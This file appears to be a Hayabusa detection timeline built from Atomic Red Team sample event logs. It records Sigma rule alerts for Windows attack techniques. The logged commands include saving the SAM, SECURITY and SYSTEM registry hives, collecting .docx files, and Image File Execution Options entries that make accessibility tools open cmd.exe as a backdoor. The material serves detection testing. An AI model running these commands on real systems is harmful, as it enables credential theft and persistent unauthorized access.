+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\Security security.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\System system.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SAM sam.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c: /b /s .docx ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .docx  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
